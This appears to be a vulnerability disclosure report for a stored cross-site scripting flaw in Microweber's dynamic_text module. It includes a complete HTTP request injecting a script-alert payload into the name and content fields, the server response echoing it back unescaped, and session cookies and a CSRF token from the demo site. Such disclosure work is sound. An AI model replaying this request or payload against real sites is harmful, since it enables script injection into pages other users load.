XSS on dynamic_text module in microweber/microweber

Valid

Reported on

Mar 10th 2022

Description

There is XSS vulnerability on dynamic_text module.

Proof of Concept

Visit - https://demo.microweber.org/demo/admin/view:modules/load_module:dynamic_text

Impact

Below Post request was used to upload XSS payload

POST /demo/api/save_dynamic_text HTTP/1.1
Host: demo.microweber.org
Cookie: remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; mw-back-to-live-edit=true; show-sidebar-layouts=1; _ga=GA1.2.1990870926.1646662573; twk_uuid_599594841b1bed47ceb0520f={"uuid":"1.4gkrYx1pzbRZRQsvreYdgHaygG5EJY38fHOKxQz8FFKqX7uVHEiHATiTi6PECYDSbfVRQpTMHYk0YbGWZIKevu3luS32NQqhPAhdmzQ5EM9f6aPpZpmc8W8L174F1NvcgS2BLVxa8rgdUYdRPot","version":3,"domain":"microweber.org","ts":1646662604068}; laravel_session=mQQd7vyDuLr7Eo043e36yKCRKXxnSam9QOVOolEF; _gid=GA1.2.1617290676.1646885272; csrf-token-data=%7B%22value%22%3A%22GeK4wyn9O9GNXGMb11BZnpVSbQlBJaYSF7bc9rZt%22%2C%22expiry%22%3A1646886288956%7D; back_to_admin=https%3A//demo.microweber.org/demo/admin/view%3Amodules/load_module%3Adynamic_text
Content-Length: 121
Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.microweber.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.microweber.org/demo/admin/view:modules/load_module:dynamic_text
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

name=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&content=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&id=false

Response

HTTP/1.1 200 OK
Date: Thu, 10 Mar 2022 13:41:25 GMT
Server: Apache
Cache-Control: no-cache, private
Set-Cookie: laravel_session=mQQd7vyDuLr7Eo043e36yKCRKXxnSam9QOVOolEF; expires=Thu, 10-Mar-2022 15:41:25 GMT; Max-Age=7200; path=/; httponly; samesite=lax
Connection: close
Content-Type: application/json
Content-Length: 197

{"name":"<script>alert(document.domain)<\/script>","content":"<script>alert(document.domain)<\/script>","updated_at":"2022-03-10T13:41:25.000000Z","created_at":"2022-03-10T13:41:25.000000Z","id":1}